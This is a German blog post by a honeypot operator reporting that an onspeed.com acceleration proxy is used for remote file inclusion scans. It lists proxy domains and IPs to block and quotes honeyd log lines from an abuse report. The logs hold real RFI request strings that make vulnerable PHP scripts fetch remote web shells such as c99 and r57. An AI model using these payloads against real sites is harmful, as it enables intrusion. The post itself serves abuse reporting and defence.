onspeed.com als Beschleuniger für hacker

Friday, October 3. 2008

Posted by katsumi in honeyd, honeypot, malware at 16:44 | Comments (0) | Trackbacks (0)

onspeed.com als Beschleuniger für hacker

onspeed.com ist laut deren Webseite ein Dienst,
der langsame Verbindungen beim browsen beschleunigen soll.
Wenn ich dies richtig verstanden habe,
bekommt man für knapp 25 Dollars Zugang zu einem Service,
der Browseranfragen aus einem Cache mit gepackten Daten beantwortet. (deflate)
Ebenso ist es aber dadurch möglich,
RFI scans mit einer ziemlich hohen Geschwindigkeit durchzuführen.
Das soll jetzt keine Werbung sein.
Ich meine das ernst.
onspeed hat bisher nicht auf meine mails geantwortet,
daher nun meine Empfehlung an alle Admins, Hostmaster und was immer folgende domains/IPs zu blocken:

Stand  3.10.2008 17:05
domain                              IP
---------------------------------------------------------
navaho.onspeed.com  	72.3.137.82
yuma.onspeed.com 	72.3.137.83
vanadium.onspeed.com 	83.138.172.72
chromium.onspeed.com 	83.138.172.76
silicon.onspeed.com 	 212.100.250.218
sulphur.onspeed.com 	212.100.250.225
aluminium.onspeed.com 	 212.100.250.217
nickel.onspeed.com     212.100.250.230

Ich persönlich habe kein Problem damit etwas grosszügiger zu sein:

72.3.137.0/24
83.138.172.0/24
212.100.250.0/24

Hier ein Auszug aus der abuse mail:

CODE:

Hello, the following honeyd log lines will show users, that abuse your service for RFI hacking. there will be only one sample per user, but there were a lot of attacks. please request full log file. from honeyd: ################################### --MARK--,"Sat Sep 27 16:55:44 CEST 2008","apache/HTTP","72.3.137.82","172.16.1.10",38441,80, "GET //includes/mailaccess/errors.php?error=http://rolex.100webspace.net/clip.txt? HTTP/1.0 Host: [CENSORED].org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 X-Forwarded-For: 82.128.26.111 X-SlipStream-Username: innocentman Via: 1.1 navaho.onspeed.com:3128 (squid/2.6.STABLE18) Cache-Control: max-age=259200 Connection: keep-alive ", --ENDMARK-- ################################### --MARK--,"Sat Sep 27 16:56:41 CEST 2008","apache/HTTP","72.3.137.83","172.16.1.10",38330,80, "GET //includes/mailaccess/errors.php?error=http://www.pcguvenlik.com/portal/media/www.txt? HTTP/1.0 Host: [CENSORED].org Accept: */* Accept-Language: en-ca UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; 3P_UVRM 1.0.8.3; Crazy Brow ser 3.0.0 RC1) X-Forwarded-For: 82.128.23.20 X-SlipStream-Username: nairalander Via: 1.1 yuma.onspeed.com:3128 (squid/2.6.STABLE18) Cache-Control: max-age=259200 Connection: keep-alive ", --ENDMARK-- ################################### --MARK--,"Sat Sep 27 17:03:43 CEST 2008","apache/HTTP","83.138.172.72","172.16.1.10",46967,80, "GET //includes/mailaccess/errors.php?error=http://myr.wz.cz/upload/skins/c99.txt? HTTP/1.0 Host: down.[CENSORED].org Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x -ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: en-za UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Crazy Browser 3.0.0 RC1) X-Forwarded-For: 41.219.246.12 X-SlipStream-Username: wizards817 Via: 1.1 vanadium.onspeed.com:3128 (squid/2.6.STABLE18) Cache-Control: max-age=259200 Connection: keep-alive ", --ENDMARK-- ################################### --MARK--,"Sat Sep 27 18:25:39 CEST 2008","apache/HTTP","72.3.137.82","172.16.1.10",39783,80, "GET /index.php?l=http://vncownz.webcindario.com/r57?? HTTP/1.0 Host: www.[CENSORED].eu Accept: */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) X-Forwarded-For: 82.128.27.78 X-SlipStream-Username: dareosibo Via: 1.1 navaho.onspeed.com:3128 (squid/2.6.STABLE18) Cache-Control: max-age=259200 Connection: keep-alive ", --ENDMARK-- ################################### --MARK--,"Sat Sep 27 20:24:01 CEST 2008","apache/HTTP","83.138.172.76","172.16.1.10",55206,80, "GET /index.php?p=http://br.geocities.com/redcrew03/Manutd4life.txt??? HTTP/1.0 Host: www.[CENSORED].org User-Agent: Opera/9.51 (Windows NT 5.1; U; en) Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: en-US,en;q=0.9 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 X-Forwarded-For: 196.1.179.153 X-SlipStream-Username: trSVSNyDQN Via: 1.1 chromium.onspeed.com:3128 (squid/2.6.STABLE18) Cache-Control: max-age=259200 Connection: keep-alive ", --ENDMARK-- #################################### --MARK--,"Sat Sep 27 21:03:43 CEST 2008","apache/HTTP","212.100.250.218","172.16.1.10",46552,80, "GET /modules/vwar/convert/mvcw_conver.php?step=http://blog.justa.ru/media/uk/naija.txt? HTTP/1.0 Host: www.[CENSORED].net Accept: */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC 3.0; .NET CLR 1.0.3705; Crazy Browser 3.0.0 RC1) X-Forwarded-For: 82.128.9.212 X-SlipStream-Username: shoplinks102 Via: 1.1 silicon.onspeed.com:3128 (squid/2.6.STABLE18) Cache-Control: max-age=259200 Connection: keep-alive ", --ENDMARK-- #################################### --MARK--,"Sat Sep 27 22:34:01 CEST 2008","apache/HTTP","212.100.250.225","172.16.1.10",51038,80, "GET /start_lobby.php?CONFIG[MWCHAT_Libs]=http://evilc0der.com/r57.txt?? HTTP/1.0 Host: www.[CENSORED].net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 X-Forwarded-For: 41.219.199.17 X-SlipStream-Username: urH3DjDh Via: 1.1 sulphur.onspeed.com:3128 (squid/2.6.STABLE18) Cache-Control: max-age=259200 Connection: keep-alive ", --ENDMARK-- #################################### --MARK--,"Sun Sep 28 00:50:56 CEST 2008","apache/HTTP","72.3.137.82","172.16.1.10",45288,80, "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://white.be/info.txt? HTTP/1.0 Host: www.[CENSORED].eu User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 X-Forwarded-For: 41.219.252.19 X-SlipStream-Username: keemodass Via: 1.1 navaho.onspeed.com:3128 (squid/2.6.STABLE18) Cache-Control: max-age=259200 Connection: keep-alive ", --ENDMARK-- #################################### --MARK--,"Sun Sep 28 01:02:13 CEST 2008","apache/HTTP","212.100.250.218","172.16.1.10",44930,80, "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.geocities.com/francecard/c99.txt?? HTTP/1.0 Host: [CENSORED].org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 X-Forwarded-For: 82.128.22.101 X-SlipStream-Username: internetfast Via: 1.1 silicon.onspeed.com:3128 (squid/2.6.STABLE18) Cache-Control: max-age=259200 Connection: keep-alive ", --ENDMARK-- #################################### --MARK--,"Sun Sep 28 01:19:42 CEST 2008","apache/HTTP","72.3.137.83","172.16.1.10",38086,80, "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.barthmaler.de/c99.txt?? HTTP/1.0 Host: [CENSORED].org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 X-Forwarded-For: 82.128.32.176 X-SlipStream-Username: uch3b3lgium Via: 1.1 yuma.onspeed.com:3128 (squid/2.6.STABLE18) Cache-Control: max-age=259200 Connection: keep-alive ", --ENDMARK-- #################################### --MARK--,"Sun Sep 28 14:09:13 CEST 2008","apache/HTTP","212.100.250.218","172.16.1.10",44968,80, "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://midnightcr3w247.freehostia.com/bad.txt? HTTP/1.0 Host: [CENSORED].org User-Agent: Opera/9.50 (Windows NT 5.1; U; en) Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: en-US,en;q=0.9 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 X-Forwarded-For: 82.128.33.207 X-SlipStream-Username: zeeeho Via: 1.1 silicon.onspeed.com:3128 (squid/2.6.STABLE18) Cache-Control: max-age=259200 Connection: keep-alive ", --ENDMARK-- ################################### .....

Trackbacks

Trackback specific URI for this entry

No Trackbacks

Comments

Display comments as (Linear | Threaded)

No comments

Add Comment

Name
Email
Homepage
In reply to
Comment	To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly. Enter the string from the spam-prevention image above: BBCode format allowed
	Remember Information? Subscribe to this entry

Pages

katsumi's page
GROSPOLINA.ORG
RFI Liste

IRC.HONEYNET.CZ
Honeynet.cz IRC

ServerLost.at/the/net
nicht klicken, danke.
Administration

Quicksearch

Recently added

[wirres]Holz spal [...]
[malware]Webauftr [...]

Top Referrers

server19.xlhost.de (16741)
down.pyratz.com (190)
www.google.com (181)
www.server4you.org (166)
www.google.de (162)
www.intergenis.de (155)
blog.fdp.de (127)
www.hasicon.at (88)
88.198.38.89 (74)
honeyblog.org (62)
serverlost.de (51)
botnetz.com (45)
forums.oscommerce.de (39)
search.live.com (36)
www.netcraft.com (35)
klausnahr.wordpress.com (32)
uptime.netcraft.com (32)
pyratz.eu (31)
down.pyratz.org (25)
www.serverlost.com (24)
yourwebinterface.com (24)
www.google.co.kr (22)
www.pyratz.eu (20)
www.google.com.tr (16)
209.85.135.104 (15)
search.msn.com (13)
down.pyratz.de (12)
www.google.mu (12)
extremetracking.com (11)
www.altavista.com (10)
www.google.ch (10)
ming.tv (9)
www.google.co.id (9)
91.41.214.145 (8)
babelfish.altavista.com (7)
www.google.co.in (7)
www.google.com.eg (7)
www.google.it (7)